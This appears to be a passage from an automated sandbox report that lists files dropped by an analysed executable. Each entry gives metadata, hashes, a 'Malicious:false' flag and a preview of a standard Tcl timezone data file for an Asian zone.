                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Novokuznetsk) {. {-9223372036854775808 20928 0 LMT}. {-1441259328 21600 0 KRAT}. {-1247551200 25200 0 KRAMMTT}. {354906000 28800 1 KRAST}. {370713600 25200 0 KRAT}. {386442000 28800 1 KRAST}. {402249600 25200 0 KRAT}. {417978000 28800 1 KRAST}. {433785600 25200 0 KRAT}. {449600400 28800 1 KRAST}. {465332400 25200 0 KRAT}. {481057200 28800 1 KRAST}. {496782000 25200 0 KRAT}. {512506800 28800 1 KRAST}. {528231600 25200 0 KRAT}. {543956400 28800 1 KRAST}. {559681200 25200 0 KRAT}. {575406000 28800 1 KRAST}. {591130800 25200 0 KRAT}. {606855600 28800 1 KRAST}. {622580400 25200 0 KRAT}. {638305200 28800 1 KRAST}. {654634800 25200 0 KRAT}. {670359600 21600 0 KRAMMTT}. {670363200 25200 1 KRAST}. {686088000 21600 0 KRAT}. {695764800 25200 0 KRAMMTT}. {701798400 28800 1 KRAST}. {717519600 25200 0 KRAT}. {733258800 28800 1 KRAST}. {748983600 2

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Novosibirsk

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2126
                                                                                                                                                                                                                                                    Entropy (8bit):3.9575220631817074
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQ2sIe2lNXh/iOIYyxFRP7z/X9TipN5xCB0wuoC1SQ7x7QwC4Jc/srC2TTV9oOu6:5HYKKy/RP7zf9uXniu7ZTTwOr
                                                                                                                                                                                                                                                    MD5:30BE2EEB01A3794FABBF61FE7D85F8D3
                                                                                                                                                                                                                                                    SHA1:81A6C50077FFECAE5FA86A9785F5BB26C36464FE
                                                                                                                                                                                                                                                    SHA-256:013528D12C8A252F7A3AC908808AFF5CC37181BE54CE8B1D7E1594F06E4907DB
                                                                                                                                                                                                                                                    SHA-512:F40DE8D586686181D8999A6800DBBBD767C77A903865E97E03C8556D2AEED9749F43B9CA249CE2110A8E586FD55507BB408630A8BBBAAEF5A0CDDDDD0BA349DA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Novosibirsk) {. {-9223372036854775808 19900 0 LMT}. {-1579476700 21600 0 NOVT}. {-1247551200 25200 0 NOVMMTT}. {354906000 28800 1 NOVST}. {370713600 25200 0 NOVT}. {386442000 28800 1 NOVST}. {402249600 25200 0 NOVT}. {417978000 28800 1 NOVST}. {433785600 25200 0 NOVT}. {449600400 28800 1 NOVST}. {465332400 25200 0 NOVT}. {481057200 28800 1 NOVST}. {496782000 25200 0 NOVT}. {512506800 28800 1 NOVST}. {528231600 25200 0 NOVT}. {543956400 28800 1 NOVST}. {559681200 25200 0 NOVT}. {575406000 28800 1 NOVST}. {591130800 25200 0 NOVT}. {606855600 28800 1 NOVST}. {622580400 25200 0 NOVT}. {638305200 28800 1 NOVST}. {654634800 25200 0 NOVT}. {670359600 21600 0 NOVMMTT}. {670363200 25200 1 NOVST}. {686088000 21600 0 NOVT}. {695764800 25200 0 NOVMMTT}. {701798400 28800 1 NOVST}. {717519600 25200 0 NOVT}. {733258800 28800 1 NOVST}. {738090000 25

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Omsk

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2089
                                                                                                                                                                                                                                                    Entropy (8bit):3.8730396740921473
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQaEeHt6l6QFCxZq7LDZgr4jm5+WKvTT5Tm5HTPbEmC5QzCpomuSCh023HlUwCsp:5aapkq9DJ9EHL4mREetpTTyOZ
                                                                                                                                                                                                                                                    MD5:9D93055DC764D1532351DD929F60E178
                                                                                                                                                                                                                                                    SHA1:9E6962D86CFBB0FF375D55DEE2A72ABA6601CA85
                                                                                                                                                                                                                                                    SHA-256:61DF8A038C81BBD1014696C19E3030E1839779A76EC113BB2BAE3A1179638908
                                                                                                                                                                                                                                                    SHA-512:A350E3BC02C52C378C935A075ECE2C94370353480D02FF77E8D9D5EEA70F878B87CF5B173974D082B03D906A115D36B8FE3273D88E9234BACFB055420D7E33C9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Omsk) {. {-9223372036854775808 17610 0 LMT}. {-1582088010 18000 0 OMST}. {-1247547600 21600 0 OMSMMTT}. {354909600 25200 1 OMSST}. {370717200 21600 0 OMST}. {386445600 25200 1 OMSST}. {402253200 21600 0 OMST}. {417981600 25200 1 OMSST}. {433789200 21600 0 OMST}. {449604000 25200 1 OMSST}. {465336000 21600 0 OMST}. {481060800 25200 1 OMSST}. {496785600 21600 0 OMST}. {512510400 25200 1 OMSST}. {528235200 21600 0 OMST}. {543960000 25200 1 OMSST}. {559684800 21600 0 OMST}. {575409600 25200 1 OMSST}. {591134400 21600 0 OMST}. {606859200 25200 1 OMSST}. {622584000 21600 0 OMST}. {638308800 25200 1 OMSST}. {654638400 21600 0 OMST}. {670363200 18000 0 OMSMMTT}. {670366800 21600 1 OMSST}. {686091600 18000 0 OMST}. {695768400 21600 0 OMSMMTT}. {701802000 25200 1 OMSST}. {717523200 21600 0 OMST}. {733262400 25200 1 OMSST}. {748987200 21600 0 O

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Oral

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1683
                                                                                                                                                                                                                                                    Entropy (8bit):3.967686330951165
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQ3eHy9r8hb2JJGI4Sdgb88+8g6zcCbYQftQkSbFQvQQGeQZWbWQhKQDccXQfuQn:5FB8hb2GIpco6Z4b
                                                                                                                                                                                                                                                    MD5:4BAEFD23FCA4E54B97FD87022C99A34C
                                                                                                                                                                                                                                                    SHA1:E43F66AD0D661A280D0E738C5E287DE8E470E7ED
                                                                                                                                                                                                                                                    SHA-256:2D551E0CFCDEB165033A91FB36DB2104C1B1A768EACE2BF722E88555A2981072
                                                                                                                                                                                                                                                    SHA-512:6B34B16EFF99CFE6B12E3A2EF503139CBDBAC162B314DE0D031F5EEF5CC5517DA52965D84367E727924157BF19D2F522031D7760EF4F1B321EBB921C05BA0BCD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Oral) {. {-9223372036854775808 12324 0 LMT}. {-1441164324 14400 0 URAT}. {-1247544000 18000 0 URAT}. {354913200 21600 1 URAST}. {370720800 21600 0 URAT}. {386445600 18000 0 URAT}. {386449200 21600 1 URAST}. {402256800 18000 0 URAT}. {417985200 21600 1 URAST}. {433792800 18000 0 URAT}. {449607600 21600 1 URAST}. {465339600 18000 0 URAT}. {481064400 21600 1 URAST}. {496789200 18000 0 URAT}. {512514000 21600 1 URAST}. {528238800 18000 0 URAT}. {543963600 21600 1 URAST}. {559688400 18000 0 URAT}. {575413200 21600 1 URAST}. {591138000 18000 0 URAT}. {606862800 14400 0 URAT}. {606866400 18000 1 URAST}. {622591200 14400 0 URAT}. {638316000 18000 1 URAST}. {654645600 14400 0 URAT}. {662673600 14400 0 URAT}. {692827200 14400 0 ORAT}. {701809200 18000 1 ORAST}. {717530400 14400 0 ORAT}. {733269600 18000 1 ORAST}. {748994400 14400 0 ORAT}. {

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Phnom_Penh

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):175
                                                                                                                                                                                                                                                    Entropy (8bit):4.911861786274714
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8VLYO5YFwVAIgN8ELYOAvN2WFKeHKLNM0WFKELYOun:SlSWB9IZaM3y1LewVAIgKELUvN2wKTNp
                                                                                                                                                                                                                                                    MD5:754059D3B44B7D60FB3BBFC97782C6CF
                                                                                                                                                                                                                                                    SHA1:6AE931805E6A42836D65E4EBC76A58BBFB3DCAF4
                                                                                                                                                                                                                                                    SHA-256:2C2DBD952FDA5CC042073B538C240B11C5C8E614DD4A697E1AA4C80E458575D0
                                                                                                                                                                                                                                                    SHA-512:B5AA4B51699EEAE0D9F91BBAB5B682BD84537C4E2CCE282613E1FFA1DDBE562CA487FB2F8CD006EE9DBC9EFAEFA587EC9998F0364E5C932CDB42C14319328D46
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Bangkok)]} {. LoadTimeZoneFile Asia/Bangkok.}.set TZData(:Asia/Phnom_Penh) $TZData(:Asia/Bangkok).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Pontianak

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):350
                                                                                                                                                                                                                                                    Entropy (8bit):4.513241903916297
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52wKT5wFJm2OHUed9xMkc5k/wGiNCLkvmJdwGiD1HiDF4mwGiLTF/xDHW:MBp52L5wFJmdHFxbc5kwGiwLkIwGiDhY
                                                                                                                                                                                                                                                    MD5:EAC8AF8BEE6ECE49C4A5C97C283AF021
                                                                                                                                                                                                                                                    SHA1:B013A5F4350E41C2C7DBA20C5C521B696048DF55
                                                                                                                                                                                                                                                    SHA-256:221FA8C4DC94963B8ED54196FD02E41CF0B8A1F3405A38C3370EA3AE3C528630
                                                                                                                                                                                                                                                    SHA-512:317A527D4B779FC0DBC82B4808CFD58DC1CA648EE676452C73D927489F34C69B2EB9FA990C70137B94775D7E6087D3B4039D3E5042A7AB7AED18E165740DB515
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Pontianak) {. {-9223372036854775808 26240 0 LMT}. {-1946186240 26240 0 PMT}. {-1172906240 27000 0 WIB}. {-881220600 32400 0 JST}. {-766054800 27000 0 WIB}. {-683883000 28800 0 WIB}. {-620812800 27000 0 WIB}. {-189415800 28800 0 WITA}. {567964800 25200 0 WIB}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Pyongyang

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):265
                                                                                                                                                                                                                                                    Entropy (8bit):4.665742498172264
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52wK8cE4Lm2OHnNdRw8v3+zvm1T0vGLp:MBp520cEWmdHnNLv/+zjY
                                                                                                                                                                                                                                                    MD5:03F7E1DBA4E82E33605FECE76F0AE4A8
                                                                                                                                                                                                                                                    SHA1:994E352846828B785AA1757EA311DB9D29E64FA5
                                                                                                                                                                                                                                                    SHA-256:0DDF9DA71DC835702BAD6D3F894C680D925BDD133B43FC6277D4A4F73CB163C3
                                                                                                                                                                                                                                                    SHA-512:FA377EBE94518FED279635F2B6DA211BF385F186086493EFB9FCE18E5371AAD0D62D957BE0C220546977A64462D60EEE718F6AA637D9D36152127479F2CDF2DE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Pyongyang) {. {-9223372036854775808 30180 0 LMT}. {-1948782180 30600 0 KST}. {-1830414600 32400 0 JCST}. {-1017824400 32400 0 JST}. {-768646800 32400 0 KST}. {1439564400 30600 0 KST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Qatar

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):169
                                                                                                                                                                                                                                                    Entropy (8bit):4.8601645539109075
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52WFKK3vFSXGm2OHPFV4YvUQKb3VvVVGF5FRVGwvYv:SlSWB9X52wKK3vTm2OHoYRcvzGfFRVS
                                                                                                                                                                                                                                                    MD5:9462D89F06D17A43817EA860AF040C21
                                                                                                                                                                                                                                                    SHA1:EBAFBD932708A7A7228364BDBFCD864AB4BE9022
                                                                                                                                                                                                                                                    SHA-256:6E1A5814923D6C241E19B14BE409EBD3B6E2A21000B55A76F3E8B185C081F847
                                                                                                                                                                                                                                                    SHA-512:2D5617D7113B349F29AF3EBA4B4321CC0A17B1FBF673E7D23FF7482F3F16235E5070281AD73CF5C74DC019DD39F8DD40D1A4D4DDCC08F8C2B6F6D772F4A85501
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Qatar) {. {-9223372036854775808 12368 0 LMT}. {-1577935568 14400 0 GST}. {76190400 10800 0 AST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Qyzylorda

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1688
                                                                                                                                                                                                                                                    Entropy (8bit):4.021869489592274
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQweNE9FYaSkXkh8K7hYeO8rmXqI8p/9fIwgdl3xWhf89KukUCN9AC9sdulCddlR:56P0h8UhYqkqI+F7YVYfB8ptOe
                                                                                                                                                                                                                                                    MD5:DF2E642EB0CFE12904C72A4D25663912
                                                                                                                                                                                                                                                    SHA1:69F30DC39AF84B15968CE1EDC14ACCAC3A53C89B
                                                                                                                                                                                                                                                    SHA-256:3B9567139E18C3E7BABA078B8EDB942D1E9E388C7EE44F159D569A713DC7555C
                                                                                                                                                                                                                                                    SHA-512:C31EA6977FF25B8463C8B7D14A1B176C1311E522556A3F8F3C0C54D617CC929927009A870FECF75F52413EDF1E06A12FDFE0A66A9B1974975BB90350ED36C80F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Qyzylorda) {. {-9223372036854775808 15712 0 LMT}. {-1441167712 14400 0 KIZT}. {-1247544000 18000 0 KIZT}. {354913200 21600 1 KIZST}. {370720800 21600 0 KIZT}. {386445600 18000 0 KIZT}. {386449200 21600 1 KIZST}. {402256800 18000 0 KIZT}. {417985200 21600 1 KIZST}. {433792800 18000 0 KIZT}. {449607600 21600 1 KIZST}. {465339600 18000 0 KIZT}. {481064400 21600 1 KIZST}. {496789200 18000 0 KIZT}. {512514000 21600 1 KIZST}. {528238800 18000 0 KIZT}. {543963600 21600 1 KIZST}. {559688400 18000 0 KIZT}. {575413200 21600 1 KIZST}. {591138000 18000 0 KIZT}. {606862800 21600 1 KIZST}. {622587600 18000 0 KIZT}. {638312400 21600 1 KIZST}. {654642000 18000 0 KIZT}. {662670000 18000 0 KIZT}. {692823600 18000 0 QYZT}. {695768400 21600 0 QYZT}. {701802000 25200 1 QYZST}. {717523200 21600 0 QYZT}. {733262400 25200 1 QYZST}. {748987200 21600 0 QYZT}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Rangoon

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):233
                                                                                                                                                                                                                                                    Entropy (8bit):4.700824643200826
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52wK0GEEm2OHGVXdPZNGVyKFMsDVkvm8Y/s59Ln:MBp52nEEmdHGldPZNGYANkhpn
                                                                                                                                                                                                                                                    MD5:21A8C8B771F9644AB3EAED8CA4512408
                                                                                                                                                                                                                                                    SHA1:27D65D7A9E9403103CADA0C0D507708DD98DFC39
                                                                                                                                                                                                                                                    SHA-256:6CFCB7D781F87E1B7ED88FD2DAD6C80DA921CD55B50A1AC650FD2F787201FE2A
                                                                                                                                                                                                                                                    SHA-512:5292EF66277CCE29F10FB55B054A90FB6B4680D387CB4834FF5BF2F182052B5C3F6A8621A1BCEC4671851EFE8B40B8EFC31CC12F5F45DB380F68BD906F26FEB6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Rangoon) {. {-9223372036854775808 23080 0 LMT}. {-2840163880 23080 0 RMT}. {-1577946280 23400 0 BURT}. {-873268200 32400 0 JST}. {-778410000 23400 0 MMT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Riyadh

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):142
                                                                                                                                                                                                                                                    Entropy (8bit):4.950902028483272
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52WFK814tXGm2OHFukevSUi9VswvYv:SlSWB9X52wK81Hm2OHF7ePi9Vs
                                                                                                                                                                                                                                                    MD5:A39D6CB65845A20773E0FDBF12646CB6
                                                                                                                                                                                                                                                    SHA1:59CE58D2C131634EA91B6711D7DF5011AAC1D717
                                                                                                                                                                                                                                                    SHA-256:CD11B8FC28AEB740FBB2AEA75951E8CFFC046ACDEE13AE6F4761808174C2F24C
                                                                                                                                                                                                                                                    SHA-512:ECC47F7EAFDFA8B1580F38DE5ECDBF8DF93BD5F8D2E63B983758F4548155B93CFEF49B8C727DFF3E526CD548564CB93ABC4266210296B3F17491847F9DBABCB9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Riyadh) {. {-9223372036854775808 11212 0 LMT}. {-719636812 10800 0 AST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Saigon

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):183
                                                                                                                                                                                                                                                    Entropy (8bit):4.899371908380106
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8I65eVyVAIgN2h659Q2WFKwJ6h4WFK365ev:SlSWB9IZaM3yJAVyVAIgA4s2wKl4wKKK
                                                                                                                                                                                                                                                    MD5:A978C9AD6320DA94CB15324CA82C7417
                                                                                                                                                                                                                                                    SHA1:585C232F3FB2693C78C7831C1AF1DC25D6824CA7
                                                                                                                                                                                                                                                    SHA-256:73E1850BB0827043024EAFA1934190413CB36EA6FE18C90EA86B9DBC1D61EEBF
                                                                                                                                                                                                                                                    SHA-512:AE48BFB2A348CA992F2BCD6B1AF7495713B0526C326678309133D3271D90600624C096B4B8678AD7ECD19822E3BB24E27D12680FCA7FAA455D3CE324CE0B88ED
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Ho_Chi_Minh)]} {. LoadTimeZoneFile Asia/Ho_Chi_Minh.}.set TZData(:Asia/Saigon) $TZData(:Asia/Ho_Chi_Minh).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Sakhalin

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2154
                                                                                                                                                                                                                                                    Entropy (8bit):3.9200886100513186
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5i1mvzfkLCHT2voaWlOvUhxJWHflhQXAY3:gyHT2vRvwAHdSQY3
                                                                                                                                                                                                                                                    MD5:72B74A9380524E321FBECDDC57206D09
                                                                                                                                                                                                                                                    SHA1:80C6D4FF833A1FA58FD3D5EA08558FA557DB0D87
                                                                                                                                                                                                                                                    SHA-256:8B6875BC4A4D7BC318229D522C2A9CA41F64993A05AADC1E0CC3111430F25934
                                                                                                                                                                                                                                                    SHA-512:BD961D582D3C92B2C99BE6D232B57EDC2594A7CEED317F71A706BC6FBF835DD476FB0343C58013665738AC4527A4C7E1DEFF2A47CF082059041F2456F69FD148
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Sakhalin) {. {-9223372036854775808 34248 0 LMT}. {-2031039048 32400 0 JCST}. {-1017824400 32400 0 JST}. {-768560400 39600 0 SAKMMTT}. {354891600 43200 1 SAKST}. {370699200 39600 0 SAKT}. {386427600 43200 1 SAKST}. {402235200 39600 0 SAKT}. {417963600 43200 1 SAKST}. {433771200 39600 0 SAKT}. {449586000 43200 1 SAKST}. {465318000 39600 0 SAKT}. {481042800 43200 1 SAKST}. {496767600 39600 0 SAKT}. {512492400 43200 1 SAKST}. {528217200 39600 0 SAKT}. {543942000 43200 1 SAKST}. {559666800 39600 0 SAKT}. {575391600 43200 1 SAKST}. {591116400 39600 0 SAKT}. {606841200 43200 1 SAKST}. {622566000 39600 0 SAKT}. {638290800 43200 1 SAKST}. {654620400 39600 0 SAKT}. {670345200 36000 0 SAKMMTT}. {670348800 39600 1 SAKST}. {686073600 36000 0 SAKT}. {695750400 39600 0 SAKMMTT}. {701784000 43200 1 SAKST}. {717505200 39600 0 SAKT}. {733244400 43200

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Samarkand

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):912
                                                                                                                                                                                                                                                    Entropy (8bit):4.0996909489016335
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp52tlmdH897SogKk4khWuf7Z/UOfmWnmjDIdhWdMr2jmjdODPRWZsdXT4Wuwyc:cQtleA7ETh7tmdPIiOdzeJTUPc
                                                                                                                                                                                                                                                    MD5:86864CDFD578B3CD01DFCBCF3263BB3B
                                                                                                                                                                                                                                                    SHA1:8A009E64EDDBAC2F675ABACBAB742AAF414A7E7E
                                                                                                                                                                                                                                                    SHA-256:AF87E9597C2AA014C996F88AA95A87D71594436D13D3F4246B8B1AA3AA0E8E66
                                                                                                                                                                                                                                                    SHA-512:537EB0B970E42A3EB31CF3779E637698761FE598FE64BFE76827C1157E9E1421BA316299FA27F5F0ADB26645DA2587D4E7B5781CDDE5695CED5146AB3AAB74D5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Samarkand) {. {-9223372036854775808 16073 0 LMT}. {-1441168073 14400 0 SAMT}. {-1247544000 18000 0 SAMT}. {354913200 21600 1 SAMST}. {370720800 21600 0 TAST}. {386445600 18000 0 SAMT}. {386449200 21600 1 SAMST}. {402256800 18000 0 SAMT}. {417985200 21600 1 SAMST}. {433792800 18000 0 SAMT}. {449607600 21600 1 SAMST}. {465339600 18000 0 SAMT}. {481064400 21600 1 SAMST}. {496789200 18000 0 SAMT}. {512514000 21600 1 SAMST}. {528238800 18000 0 SAMT}. {543963600 21600 1 SAMST}. {559688400 18000 0 SAMT}. {575413200 21600 1 SAMST}. {591138000 18000 0 SAMT}. {606862800 21600 1 SAMST}. {622587600 18000 0 SAMT}. {638312400 21600 1 SAMST}. {654642000 18000 0 SAMT}. {670366800 21600 1 SAMST}. {683665200 21600 0 UZST}. {686091600 18000 0 UZT}. {694206000 18000 0 UZT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Seoul

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):750
                                                                                                                                                                                                                                                    Entropy (8bit):4.127244109010669
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp525mdHjauv/+zWz4aqceOcrIt04CaI8/HUYVfXzQD:cQ5edvCWzJnJGIt047I8/Hp/zQD
                                                                                                                                                                                                                                                    MD5:0DE471C9ED2CE585A03A15460D146459
                                                                                                                                                                                                                                                    SHA1:02C75252A112CFDCC6DDCFA30C0E68AA07ACE46D
                                                                                                                                                                                                                                                    SHA-256:290862830F3B606F6A4FBD50D07FE5204FC105BF97672DC84B58650C57B45117
                                                                                                                                                                                                                                                    SHA-512:A10C50863B9C292A6E4181A477FE01B9ED6E9A103ECE45DEEEDDDEEA4ABBC59F6DE21319232EEAB677A3A1396BA9382D92F2D184B262C132EEB81D6DEC49D205
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Seoul) {. {-9223372036854775808 30472 0 LMT}. {-1948782472 30600 0 KST}. {-1830414600 32400 0 JCST}. {-1017824400 32400 0 JST}. {-767350800 32400 0 KST}. {-498128400 30600 0 KST}. {-462702600 34200 1 KDT}. {-451733400 30600 0 KST}. {-429784200 34200 1 KDT}. {-418296600 30600 0 KST}. {-399544200 34200 1 KDT}. {-387451800 30600 0 KST}. {-368094600 34200 1 KDT}. {-356002200 30600 0 KST}. {-336645000 34200 1 KDT}. {-324552600 30600 0 KST}. {-305195400 34200 1 KDT}. {-293103000 30600 0 KST}. {-264933000 32400 0 KST}. {547578000 36000 1 KDT}. {560883600 32400 0 KST}. {579027600 36000 1 KDT}. {592333200 32400 0 KST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Shanghai

